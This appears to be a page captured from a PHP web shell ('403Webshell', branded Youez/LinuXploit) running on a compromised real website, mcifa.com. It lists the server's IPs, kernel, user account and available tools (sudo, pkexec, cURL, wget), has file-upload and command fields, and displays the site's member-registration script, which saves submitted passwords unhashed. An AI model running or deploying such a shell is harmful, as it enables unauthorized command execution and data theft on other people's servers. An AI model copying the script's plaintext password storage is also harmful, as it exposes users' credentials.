403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.217.139
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/banners/domains/mcifa.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/banners/domains/mcifa.com/public_html/adduser.php
<?php require 'header.php'; ?>

	<section id="content" class="sbr">
		<div class="menu-shadow"></div>
		<div class="container clearfix">
			<div class="page-header clearfix" style="margin-bottom: 20px;">
				<h1>Members Only Registration</h1>
				<div class="line"></div>
			</div>
			<!--/ .page-header-->

			<section id="main" class="twelve columns">
				<article class="entry clearfix">
					<!--/ .entry-title-->

					<!--/ .preloader-->

					<!--/ .entry-meta-->

					<div class="entry-body">
Thank you for registering for the MCIFA Members Only Web Site and Hotline Updates.
<br><br>
Your registration is being processed and you will receive an email when your application has been approved and accepted. In the meantime, an email copy of your registration form has been sent to you. Please save this e-mail.
<br><br>
Back to <a href="http://www.mcifa.com">www.mcifa.com</a>
<br></b>

<?php
if (empty($_POST['email']) || !filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
    echo 'Error, invalid email.';
    require 'sidebar.php';
    require 'footer.php';
    exit;
}

$currentDateTime = date('Y-m-d H:i:s');

$db = getWriteDb();
$stmt = $db->prepare("INSERT INTO users (fname, lname, Member, Password, EMail, City, State, Country, List, CurrentDateTime, OnOff, Address1, Address2, Zip, Phone) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 'Off', ?, ?, ?, ?)");
$stmt->execute([
    $_POST['fname'] ?? '',
    $_POST['lname'] ?? '',
    $_POST['Member'] ?? '',
    $_POST['Password'] ?? '',
    $_POST['email'] ?? '',
    $_POST['City'] ?? '',
    $_POST['State'] ?? '',
    $_POST['Country'] ?? '',
    $_POST['List'] ?? '',
    $currentDateTime,
    $_POST['Address'] ?? '',
    $_POST['Address2'] ?? '',
    $_POST['Zip'] ?? '',
    $_POST['Phone'] ?? ''
]);
?>
						<!--/ .about-author-->

					</div>
					<!--/ .entry-body-->

				</article>
				<!--/ .entry-->
			</section>				<!--/ #main-->

<?php require 'sidebar.php'; ?>



<?php require 'footer.php'; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit